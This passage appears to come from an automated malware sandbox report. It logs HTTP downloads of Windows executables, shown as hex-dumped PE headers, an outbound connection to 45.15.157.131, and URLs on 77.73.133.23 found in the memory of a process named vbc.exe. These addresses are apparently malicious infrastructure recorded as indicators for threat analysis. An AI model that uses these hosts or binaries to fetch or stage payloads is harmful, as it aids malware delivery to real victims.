00 00 e0 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e4 e9 03 00 00 f0 19 00 00 ea 03 00 00 e4 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 14 4e 00 00 00 e0 1d 00 00 2a 00 00 00 ce 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 30 1e 00 00 02 00 00 00 f8 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 1e 00 00 04 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0a 01 00 00 50 1e 00 00 0c 01 00 00 fe 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Mon, 05 Dec 2022 00:32:59 GMTContent-Type: application/octet-streamContent-Length: 449280Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 19:39:42 GMTETag: "625483fe-6db00"Expires: Mon, 05 Dec 2022 01:02:59 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9b 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 1f 84 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 00 3f 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Mon, 05 Dec 2022 00:33:00 GMTContent-Type: application/octet-streamContent-Length: 80128Connection: keep-aliveLast-Modified: Sat, 28 May 2022 21:52:46 GMTETag: "629299ae-13900"Expires: Mon, 05 Dec 2022 01:03:00 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 95 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 74 28 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 00 3f 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Mon, 05 Dec 2022 00:33:01 GMTContent-Type: application/octet-streamContent-Length: 627128Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 19:39:36 GMTETag: "625483f8-991b8"Expires: Mon, 05 Dec 2022 01:03:01 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d4 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 18 08 00 00 56 01 00 00 00 00 00 b0 2f 04 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 09 00 00 04 00 00 ed ee 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 ad bc 08 00 63 51 00 00 10 0e 09 00 2c 01 00 00 00 70 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 72 09 00 b8 1f 00 00 00 80 09 00 34 43 00 00 1c b0 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 57 08 00 18 00 00 00 68 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 13 09 00 d8 03 00 00 90 b7 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d1 16 08 00 00 10 00 00 00 18 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c ff 00 00 00 30 08 00 00 00 01 00 00 1c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 1c 00 00 00 30 09 00 00 04 00 00 00 1c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 50 09 00 00 02 00 00 00 20 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 60 09 00 00 02 00 00 00 22 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 70 09 00 00 0a 00 00 00 24 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 43 00 00 00 80 09 00 00 44 00 00 00 2e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Mon, 05 Dec 2022 00:33:02 GMTContent-Type: application/octet-streamContent-Length: 684984Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 19:40:08 GMTETag: "62548418-a73b8"Expires: Mon, 05 Dec 2022 01:03:02 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 26 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 1a 08 00 00 36 02 00 00 00 00 00 b0 1f 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 e0 0a 00 00 04 00 00 e9 81 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 34 2c 0a 00 53 00 00 00 87 2c 0a 00 c8 00 00 00 00 a0 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 54 0a 00 b8 1f 00 00 00 b0 0a 00 38 24 00 00 84 26 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 94 2e 0a 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d5 19 08 00 00 10 00 00 00 1a 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 30 08 00 00 08 02 00 00 1e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 40 0a 00 00 02 00 00 00 26 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 90 0a 00 00 02 00 00 00 28 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 a0 0a 00 00 04 00 00 00 2a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 38 24 00 00 00 b0 0a 00 00 26 00 00 00 2e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Mon, 05 Dec 2022 00:33:04 GMTContent-Type: application/octet-streamContent-Length: 254392Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 19:39:58 GMTETag: "6254840e-3e1b8"Expires: Mon, 05 Dec 2022 01:03:04 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 27 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f2 00 00 00 00 00 00 80 ce 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 a1 de 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 74 76 03 00 53 01 00 00 c7 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c2 03 00 b8 1f 00 00 00 c0 03 00 98 35 00 00 68 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 44 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 ca 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 04 ac 00 00 00 e0 02 00 00 ae 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 98 35 00 00 00 c0 03 00 00 36 00 00 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Mon, 05 Dec 2022 00:33:05 GMTContent-Type: application/octet-streamContent-Length: 1099223Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 17:28:56 GMTETag: "62546558-10c5d7"Expires: Mon, 05 Dec 2022 01:03:05 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 22 a9 2c 62 00 76 0e 00 b2 13 00 00 e0 00 06 21 0b 01 02 19 00 0c 0b 00 00 fa 0c 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 20 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 10 0f 00 00 06 00 00 c8 9d 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 0c 00 6e 2a 00 00 00 e0 0c 00 d0 0c 00 00 00 10 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 e0 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c e2 0c 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 0a 0b 00 00 10 00 00 00 0c 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 20 0b 00 00 28 00 00 00 12 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 10 44 01 00 00 50 0b 00 00 46 01 00 00 3a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 a0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 6e 2a 00 00 00 b0 0c 00 00 2c 00 00 00 80 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 e0 0c 00 00 0e 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 f0 0c 00 00 02 00 00 00 ba 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 00 0d 00 00 02 00 00 00 bc 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 10 0d 00 00 06 00 00 00 be 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 e0 3b 00 00 00 20 0d 00 00 3c 00 00 00 c4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 60 0d 00 00 06 00 00 00 00 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 70 0d 00 00 ca 00 00 00 06 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 40 0e 00 00 28 00 00 00

Source: Joe Sandbox View

ASN Name: AS43260TR AS43260TR

Source: Joe Sandbox View	IP Address: 162.159.129.233 162.159.129.233
Source: Joe Sandbox View	IP Address: 162.159.129.233 162.159.129.233

Source: global traffic

TCP traffic: 192.168.2.3:49702 -> 45.15.157.131:36457

Source: vbc.exe, 00000035.00000003.451210023.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.366989185.0000000000D48000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.376170694.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.378592117.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.384375379.0000000000D58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/
Source: vbc.exe, 00000035.00000003.371185997.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.376486262.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.378909675.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.385153216.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.369431575.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.367671092.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.402409163.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.360226289.0000000000D4A000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000002.460663571.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.400907304.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.373504720.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.451210023.0000000000D66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/7
Source: vbc.exe, 00000035.00000003.400741053.0000000000D58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.73.133.23/a7a8ab0e01US
Source: vbc.exe, 00000035.00000003.448733056.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.411328644.0000000000D7B000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000002.461676500.0000000000D7A000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.401199207.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.376368639.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.361688303.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.384732524.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.402134353.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000035.00000003.360195096.0000000000D3E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 